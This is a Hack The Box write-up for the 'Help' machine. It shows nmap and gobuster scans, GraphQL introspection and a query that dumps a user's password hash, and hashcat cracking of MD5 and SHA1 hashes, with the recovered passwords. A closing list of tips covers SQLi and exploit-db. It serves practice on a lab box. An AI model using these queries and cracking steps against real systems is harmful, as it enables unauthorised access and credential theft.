This post documents my process for solving the Help box on Hack The Box. This box involves GraphQL enumeration, credential dumping, hash cracking, and classic web application enumeration and exploitation.

Recon

Initial nmap scan:

nmap -sC -sV -oA nmap/help <IP>

Found GraphQL running on port 3000.

GraphQL Enumeration

Referred to PayloadsAllTheThings - GraphQL Injection to start enumeration.

Discovered GraphQL types via introspection:

http://10.10.10.121:3000/graphql?query={__schema{types{name}}}

Full schema dump and queries revealed a user type with username and password fields.

Dumping Credentials

Queried for the user credentials:

http://10.10.10.121:3000/graphql?query={user{username,password}}

Result:

  • username: helpme@helpme.com
  • password: 5d3c93182bb20f07b994a7f617e99cff (MD5)

Cracked the password using hashcat:

hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
# 5d3c93182bb20f07b994a7f617e99cff:godhelpmeplz

Web Enumeration

Service on port 80 redirects to help.htb. Added to /etc/hosts, ran gobuster:

gobuster dir -w <wordlist> -u http://help.htb/ -t 100

Found:

  • /support
  • /javascript

Application Version Detection & Further Exploitation

Checked GitHub for HelpDeskZ version. Found a SHA1 hash:
d318f44739dced66793b1a603028133a76ae680e

Cracked with hashcat/john and wordlist:

  • password: Welcome1

Found admin email: support@mysite.com

Tips & Lessons Learned

  1. Enumerate all possible attack vectors: authentication, file fetching, attachment access, etc.
  2. If SQLi payloads don’t work in Burp, try directly in the browser or with other tools.
  3. If you can get source code, study it for logic and vulnerabilities.
  4. When crafting SQLi payloads, use the correct number of parentheses—sometimes grouping helps.
  5. Use resources like exploit-db.com or searchsploit to find ready-made exploits and inspiration.
  6. Combining GraphQL enumeration with traditional web enumeration yields powerful results.
  7. Password cracking (MD5, SHA1) with hashcat is a must-have skill in CTFs.

Writeup based on my exploitation process and public community resources.